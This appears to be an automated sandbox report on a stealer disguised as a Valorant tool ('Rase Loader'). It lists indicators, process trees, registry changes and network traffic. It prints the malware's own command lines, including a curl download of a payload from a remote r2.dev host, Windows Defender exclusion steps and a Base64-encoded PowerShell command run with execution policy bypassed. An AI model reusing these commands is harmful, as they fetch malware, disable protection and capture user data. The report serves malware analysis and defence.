URL:

https://gofile.io/d/Ras6yr

Full analysis: https://app.any.run/tasks/46c4e5b1-f91a-4872-b1fe-5f019d83c6bc
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: February 18, 2026, 12:48:04
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
possible-phishing
stealer
evasion
python
nodejs
Indicators:
MD5:

F9FA31E1772A16CA06105DA862CC95A6

SHA1:

5ADC88AF109D72D316D15B532E680CEAFFE66E2D

SHA256:

F2904531E1BCBC208E1F3DAFC5A1C9C2BE65AC8CA0853F2AF3E19B778BD51C81

SSDEEP:

3:N8rxL10FX:2ZmX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • Rase Loader.exe (PID: 8144)
      • cmd.exe (PID: 6812)
      • cmd.exe (PID: 8644)
      • cmd.exe (PID: 5448)
      • cmd.exe (PID: 8200)
    • Changes Windows Defender settings

      • cmd.exe (PID: 6812)
      • cmd.exe (PID: 8644)
      • cmd.exe (PID: 5448)
      • cmd.exe (PID: 8200)
    • Executing a file with an untrusted certificate

      • BrowserSnatch.exe (PID: 5796)
      • rase3.exe (PID: 664)
      • rase3.exe (PID: 6628)
      • rase3.exe (PID: 5240)
    • Steals credentials from Web Browsers

      • rase3.exe (PID: 664)
      • boom.exe (PID: 1980)
    • Changes powershell execution policy (Bypass)

      • boom.exe (PID: 1980)
    • Actions looks like stealing of personal data

      • boom.exe (PID: 1980)
  • SUSPICIOUS

    • Malware-specific behavior (creating "System.dll" in Temp)

      • ValoranCore.exe (PID: 1404)
      • BrowserSnatch.exe (PID: 5796)
    • The process creates files with name similar to system file names

      • ValoranCore.exe (PID: 1404)
      • BrowserSnatch.exe (PID: 5796)
    • Application launched itself

      • Rase Loader.exe (PID: 8144)
      • rase3.exe (PID: 664)
      • boom.exe (PID: 7028)
    • Hides errors and continues executing the command without stopping

      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 4336)
      • powershell.exe (PID: 6008)
      • powershell.exe (PID: 5816)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 5456)
      • cmd.exe (PID: 7764)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6812)
      • cmd.exe (PID: 8644)
      • cmd.exe (PID: 5448)
      • cmd.exe (PID: 8200)
      • cmd.exe (PID: 1272)
      • boom.exe (PID: 1980)
    • Starts CMD.EXE for commands execution

      • Rase Loader.exe (PID: 8144)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6812)
      • cmd.exe (PID: 8644)
      • cmd.exe (PID: 5448)
      • cmd.exe (PID: 8200)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 6812)
      • cmd.exe (PID: 8644)
      • cmd.exe (PID: 5448)
      • cmd.exe (PID: 8200)
      • cmd.exe (PID: 1272)
      • boom.exe (PID: 1980)
    • Filtering the input of cmdlet (POWERSHELL)

      • powershell.exe (PID: 7976)
    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 7976)
    • Executes application which crashes

      • chrome.exe (PID: 9176)
      • msedge.exe (PID: 7572)
    • Process drops python dynamic module

      • boom.exe (PID: 7028)
    • Loads Python modules

      • boom.exe (PID: 1980)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1352)
    • Base64-obfuscated command line is found

      • boom.exe (PID: 1980)
    • Checks for external IP

      • boom.exe (PID: 1980)
      • svchost.exe (PID: 2232)
  • INFO

    • Drops script file

      • msedge.exe (PID: 8060)
      • ValoranCore.exe (PID: 1404)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 4336)
      • powershell.exe (PID: 6008)
      • powershell.exe (PID: 5816)
      • Rase Loader.exe (PID: 8144)
      • powershell.exe (PID: 7976)
      • rase3.exe (PID: 664)
      • BrowserSnatch.exe (PID: 5796)
      • boom.exe (PID: 1980)
      • powershell.exe (PID: 1352)
    • Application launched itself

      • msedge.exe (PID: 8060)
      • msedge.exe (PID: 9212)
    • Reads Environment values

      • identity_helper.exe (PID: 8224)
      • identity_helper.exe (PID: 7656)
      • Rase Loader.exe (PID: 8144)
      • rase3.exe (PID: 664)
    • Reads the computer name

      • identity_helper.exe (PID: 8224)
      • identity_helper.exe (PID: 7656)
      • Rase Loader.exe (PID: 8144)
      • ValoranCore.exe (PID: 1404)
      • Rase Loader.exe (PID: 6768)
      • Rase Loader.exe (PID: 1028)
      • curl.exe (PID: 1404)
      • 7za.exe (PID: 5664)
      • rase3.exe (PID: 664)
      • BrowserSnatch.exe (PID: 5796)
      • rase3.exe (PID: 5240)
      • boom.exe (PID: 7028)
      • boom.exe (PID: 1980)
      • rase3.exe (PID: 6628)
    • Checks supported languages

      • identity_helper.exe (PID: 8224)
      • identity_helper.exe (PID: 7656)
      • ValoranCore.exe (PID: 1404)
      • Rase Loader.exe (PID: 8144)
      • Rase Loader.exe (PID: 6768)
      • Rase Loader.exe (PID: 1028)
      • curl.exe (PID: 1404)
      • UnRAR.exe (PID: 8292)
      • 7za.exe (PID: 5664)
      • chromelevator.exe (PID: 2368)
      • BrowserSnatch.exe (PID: 5796)
      • rase3.exe (PID: 664)
      • rase3.exe (PID: 6628)
      • boom.exe (PID: 7028)
      • boom.exe (PID: 1980)
      • rase3.exe (PID: 5240)
    • Manual execution by a user

      • WinRAR.exe (PID: 9100)
      • ValoranCore.exe (PID: 8716)
      • ValoranCore.exe (PID: 1404)
      • Rase Loader.exe (PID: 7420)
      • Rase Loader.exe (PID: 8144)
    • Creates a software uninstall entry

      • ValoranCore.exe (PID: 1404)
    • There is functionality for taking screenshot (YARA)

      • ValoranCore.exe (PID: 1404)
    • Reads product name

      • Rase Loader.exe (PID: 8144)
      • rase3.exe (PID: 664)
    • Creates files or folders in the user directory

      • Rase Loader.exe (PID: 8144)
      • ValoranCore.exe (PID: 1404)
      • WerFault.exe (PID: 7224)
      • WerFault.exe (PID: 5316)
      • rase3.exe (PID: 664)
      • boom.exe (PID: 1980)
    • Create files in a temporary directory

      • ValoranCore.exe (PID: 1404)
      • Rase Loader.exe (PID: 8144)
      • curl.exe (PID: 1404)
      • 7za.exe (PID: 5664)
      • UnRAR.exe (PID: 8292)
      • BrowserSnatch.exe (PID: 5796)
      • rase3.exe (PID: 664)
      • boom.exe (PID: 7028)
      • boom.exe (PID: 1980)
    • Creates files in the program directory

      • ValoranCore.exe (PID: 1404)
    • Reads security settings of Internet Explorer

      • ValoranCore.exe (PID: 1404)
      • BrowserSnatch.exe (PID: 5796)
    • Reads the machine GUID from the registry

      • Rase Loader.exe (PID: 8144)
      • rase3.exe (PID: 664)
    • Reads CPU info

      • Rase Loader.exe (PID: 8144)
    • Checks proxy server information

      • Rase Loader.exe (PID: 8144)
      • WerFault.exe (PID: 7224)
      • WerFault.exe (PID: 5316)
      • rase3.exe (PID: 664)
      • boom.exe (PID: 1980)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 4336)
      • powershell.exe (PID: 6008)
      • powershell.exe (PID: 5816)
    • Node.js compiler has been detected

      • Rase Loader.exe (PID: 8144)
    • Execution of CURL command

      • Rase Loader.exe (PID: 8144)
    • Process checks computer location settings

      • rase3.exe (PID: 664)
    • Returns hidden items found within a container (POWERSHELL)

      • conhost.exe (PID: 1656)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
232
Monitored processes
86
Malicious processes
9
Suspicious processes
2

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
664C:\Users\admin\AppData\Local\Temp\38zbHxBJooRAVtinhALUSI2G1Z8\rase3.exe C:\Users\admin\AppData\Local\Temp\38zbHxBJooRAVtinhALUSI2G1Z8\rase3.exe
BrowserSnatch.exe
User:
admin
Company:
Ayana
Integrity Level:
HIGH
Description:
rase3
Exit code:
0
Version:
1.0.0
Modules
Images
c:\users\admin\appdata\local\temp\38zbhxbjooravtinhalusi2g1z8\rase3.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1028"C:\Program Files\Rase Loader\Rase Loader.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\admin\AppData\Roaming\rase-loader" --mojo-platform-channel-handle=1984 --field-trial-handle=1696,i,12959234501103611606,9535655338364693196,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version /prefetch:8C:\Program Files\Rase Loader\Rase Loader.exeRase Loader.exe
User:
admin
Company:
Rase
Integrity Level:
HIGH
Description:
Rase Loader
Exit code:
0
Version:
1.0.0
Modules
Images
c:\program files\rase loader\rase loader.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\dbghelp.dll
c:\program files\rase loader\ffmpeg.dll
1272C:\WINDOWS\system32\cmd.exe /d /s /c "powershell -NoProfile -Command "Get-ChildItem -Path 'C:\Users\admin\AppData\Local\Temp\SystemProvider\Diagnostics' -Filter '*.exe' | Unblock-File""C:\Windows\System32\cmd.exeRase Loader.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1352powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand CgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzACwAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcACgAkAHMAYwByAGUAZQBuAHMAIAA9ACAAWwBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4AUwBjAHIAZQBlAG4AXQA6ADoAQQBsAGwAUwBjAHIAZQBlAG4AcwAKACQAaQAgAD0AIAAxAAoAZgBvAHIAZQBhAGMAaAAgACgAJABzAGMAcgBlAGUAbgAgAGkAbgAgACQAcwBjAHIAZQBlAG4AcwApACAAewAKACAAIAAgACAAdAByAHkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAYgBvAHUAbgBkAHMAIAA9ACAAJABzAGMAcgBlAGUAbgAuAEIAbwB1AG4AZABzAAoAIAAgACAAIAAgACAAIAAgACQAYgBtAHAAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEQAcgBhAHcAaQBuAGcALgBCAGkAdABtAGEAcAAgACQAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgACQAYgBvAHUAbgBkAHMALgBIAGUAaQBnAGgAdAAKACAAIAAgACAAIAAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkACgAgACAAIAAgACAAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBDAG8AcAB5AEYAcgBvAG0AUwBjAHIAZQBlAG4AKAAkAGIAbwB1AG4AZABzAC4ATABvAGMAYQB0AGkAbwBuACwAIABbAEQAcgBhAHcAaQBuAGcALgBQAG8AaQBuAHQAXQA6ADoARQBtAHAAdAB5ACwAIAAkAGIAbwB1AG4AZABzAC4AUwBpAHoAZQApAAoAIAAgACAAIAAgACAAIAAgACQAZgBpAGwAZQBwAGEAdABoACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAAJABwAHcAZAAgACIARABpAHMAcABsAGEAeQBfACgAJABpACkALgBwAG4AZwAiAAoAIAAgACAAIAAgACAAIAAgACQAYgBtAHAALgBTAGEAdgBlACgAJABmAGkAbABlAHAAYQB0AGgALAAgAFsARAByAGEAdwBpAG4AZwAuAEkAbQBhAGcAaQBuAGcALgBJAG0AYQBnAGUARgBvAHIAbQBhAHQAXQA6ADoAUABuAGcAKQAKACAAIAAgACAAIAAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEQAaQBzAHAAbwBzAGUAKAApAAoAIAAgACAAIAAgACAAIAAgACQAYgBtAHAALgBEAGkAcwBwAG8AcwBlACgAKQAKACAAIAAgACAAIAAgACAAIAAkAGkAKwArAAoAIAAgACAAIAB9ACAAYwBhAHQAYwBoACAAewAKACAAIAAgACAAIAAgACAAIAAjACAASABhAHQAYQAgAHMAZQBzAHMAaQB6AGMAZQAgAGEAdABsAGEAbgAxAXIACgAgACAAIAAgAH0ACgB9AAoAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeboom.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
1400"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --disable-quic --onnx-enabled-for-ee --string-annotations --always-read-main-dll --field-trial-handle=4084,i,2576760846006579584,10004749089296261665,262144 --disable-features=HttpsFirstBalancedMode,HttpsFirstModeV2,HttpsOnlyMode,HttpsUpgrades --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1404"C:\Users\admin\Downloads\ValorantCore\ValoranCore.exe" C:\Users\admin\Downloads\ValorantCore\ValoranCore.exe
explorer.exe
User:
admin
Company:
Rase
Integrity Level:
HIGH
Description:
Rase Loader Application
Exit code:
0
Version:
1.0.0
Modules
Images
c:\users\admin\downloads\valorantcore\valorancore.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
1404curl.exe -L -o C:\Users\admin\AppData\Local\Temp\SystemProvider\Diagnostics\asdasdsa.zip -s -S --ssl-no-revoke --insecure --proxy-insecure --retry 3 --retry-delay 2 --retry-all-errors --connect-timeout 45 --max-time 180 -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" https://pub-aef10e04c28841d19619ee20a50d78c1.r2.dev/asdasdsa.zipC:\Windows\System32\curl.exe
Rase Loader.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
1656\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1684"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --always-read-main-dll --field-trial-handle=1352,i,4254633832655653913,7613329121506534930,262144 --variations-seed-version --mojo-platform-channel-handle=3940 /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1728\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
48 515
Read events
48 487
Write events
22
Delete events
6

Modification events

(PID) Process:(9100) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(9100) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(9100) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(9100) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(1404) ValoranCore.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\cf853563-feb2-57f1-9bd3-5f352cf13052
Operation:writeName:InstallLocation
Value:
C:\Program Files\Rase Loader
(PID) Process:(1404) ValoranCore.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\cf853563-feb2-57f1-9bd3-5f352cf13052
Operation:writeName:KeepShortcuts
Value:
true
(PID) Process:(1404) ValoranCore.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\cf853563-feb2-57f1-9bd3-5f352cf13052
Operation:writeName:ShortcutName
Value:
Rase Loader
(PID) Process:(1404) ValoranCore.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cf853563-feb2-57f1-9bd3-5f352cf13052
Operation:writeName:DisplayName
Value:
Rase Loader 1.0.0
(PID) Process:(1404) ValoranCore.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cf853563-feb2-57f1-9bd3-5f352cf13052
Operation:writeName:UninstallString
Value:
"C:\Program Files\Rase Loader\Uninstall Rase Loader.exe" /allusers
(PID) Process:(1404) ValoranCore.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cf853563-feb2-57f1-9bd3-5f352cf13052
Operation:writeName:QuietUninstallString
Value:
"C:\Program Files\Rase Loader\Uninstall Rase Loader.exe" /allusers /S
Executable files
1
Suspicious files
20
Text files
53
Unknown types
896

Dropped files

PID
Process
Filename
Type
8060msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\ClientCertificates\LOG.old~RFc135e.TMP
MD5:
SHA256:
8060msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\ClientCertificates\LOG.old
MD5:
SHA256:
8060msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RFc136e.TMP
MD5:
SHA256:
8060msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
8060msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RFc136e.TMP
MD5:
SHA256:
8060msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RFc137d.TMP
MD5:
SHA256:
8060msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
8060msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
8060msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RFc137d.TMP
MD5:
SHA256:
8060msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
186
TCP/UDP connections
84
DNS requests
84
Threats
36

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7248
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
GET
200
204.79.197.203:80
http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQ3L3%2F%2Fa6ADK8NraY2GXzVaYrHG4AQUb6t%2B2v%2BXQ3LsO2d33oJhNYhHQoUCEzMAAAAGb6JMMcOVb6sAAAAAAAY%3D
US
binary
959 b
whitelisted
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8my1oj8MfWpz%2F7Y%3D
US
binary
314 b
whitelisted
6804
msedge.exe
GET
200
150.171.27.11:80
http://edge.microsoft.com/browsernetworktime/time/1/current?cup2key=2:2BcAlHYOscaaU7YmW0mcPlQtJsK-cnVolX9XBRx3qbI&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
US
binary
101 b
whitelisted
6804
msedge.exe
GET
200
150.171.22.17:443
https://config.edge.skype.com/config/v1/Edge/133.0.3065.92?clientId=4489578223053569932&agents=Edge%2CEdgeConfig%2CEdgeServices%2CEdgeFirstRun%2CEdgeFirstRunConfig&osname=win&client=edge&channel=stable&scpfre=0&osarch=x86_64&osver=10.0.19045&wu=1&devicefamily=desktop&uma=0&sessionid=67&mngd=0&installdate=1661339457&edu=0&soobedate=1504771245&bphint=2&fg=1&lbfgdate=1771418890&lafgdate=0
US
binary
4.47 Kb
whitelisted
6804
msedge.exe
GET
200
104.18.23.222:443
https://copilot.microsoft.com/c/api/user/eligibility
US
binary
25 b
whitelisted
6804
msedge.exe
GET
200
13.107.213.44:443
https://api.edgeoffer.microsoft.com/edgeoffer/pb/experiments?appId=edge-extensions&country=US
US
binary
82 b
whitelisted
6804
msedge.exe
GET
200
150.171.27.11:443
https://edge.microsoft.com/serviceexperimentation/v3/?osname=win&channel=stable&osver=10.0.19045&devicefamily=desktop&installdate=1661339457&clientversion=133.0.3065.92&experimentationmode=2&scpguard=0&scpfull=0&scpver=0
US
binary
295 b
whitelisted
6804
msedge.exe
GET
200
51.75.242.210:443
https://gofile.io/plugins/fontawesome/css/all.min.css
FR
binary
94.2 Kb
unknown
6804
msedge.exe
GET
200
51.75.242.210:443
https://gofile.io/d/Ras6yr
FR
binary
8.22 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
7668
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
Not routed
whitelisted
5276
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
20.190.160.64:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7248
svchost.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
5532
SearchApp.exe
2.16.241.205:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
204.79.197.203:80
oneocsp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
132.164.187.92:443
licensing.mp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
login.live.com
  • 20.190.160.64
  • 20.190.160.128
  • 40.126.32.76
  • 20.190.160.3
  • 20.190.160.66
  • 40.126.32.138
  • 20.190.160.5
  • 40.126.32.68
  • 40.126.31.129
  • 20.190.159.75
  • 20.190.159.130
  • 20.190.159.0
  • 40.126.31.130
  • 20.190.159.64
  • 40.126.31.131
  • 20.190.159.73
  • 40.126.31.2
  • 20.190.159.128
  • 40.126.31.3
  • 20.190.159.68
  • 40.126.31.73
  • 20.190.159.129
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
www.bing.com
  • 2.16.241.205
  • 2.16.241.221
  • 2.16.241.222
  • 2.16.241.223
  • 2.16.241.206
  • 2.16.241.218
  • 2.16.241.203
  • 2.16.241.219
  • 2.16.241.200
  • 92.123.104.58
  • 92.123.104.63
  • 92.123.104.56
  • 92.123.104.62
  • 92.123.104.65
  • 92.123.104.59
  • 92.123.104.55
  • 92.123.104.61
  • 92.123.104.53
whitelisted
google.com
  • 172.217.168.78
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
oneocsp.microsoft.com
  • 204.79.197.203
whitelisted
licensing.mp.microsoft.com
  • 132.164.187.92
whitelisted
self.events.data.microsoft.com
  • 13.89.178.26
whitelisted
edge.microsoft.com
  • 150.171.27.11
  • 150.171.28.11
whitelisted
config.edge.skype.com
  • 150.171.22.17
whitelisted

Threats

PID
Process
Class
Message
6804
msedge.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in TLS SNI (gofile .io)
6804
msedge.exe
Potentially Bad Traffic
ET FILE_SHARING Online File Storage Domain in DNS Lookup (gofile .io)
6804
msedge.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in TLS SNI (gofile .io)
6804
msedge.exe
Potentially Bad Traffic
ET FILE_SHARING Online File Storage Domain in DNS Lookup (gofile .io)
6804
msedge.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in TLS SNI (gofile .io)
6804
msedge.exe
Potentially Bad Traffic
ET FILE_SHARING Online File Storage Domain in DNS Lookup (gofile .io)
6804
msedge.exe
Potentially Bad Traffic
ET FILE_SHARING Online File Storage Domain in DNS Lookup (gofile .io)
6804
msedge.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in TLS SNI (gofile .io)
6804
msedge.exe
Potentially Bad Traffic
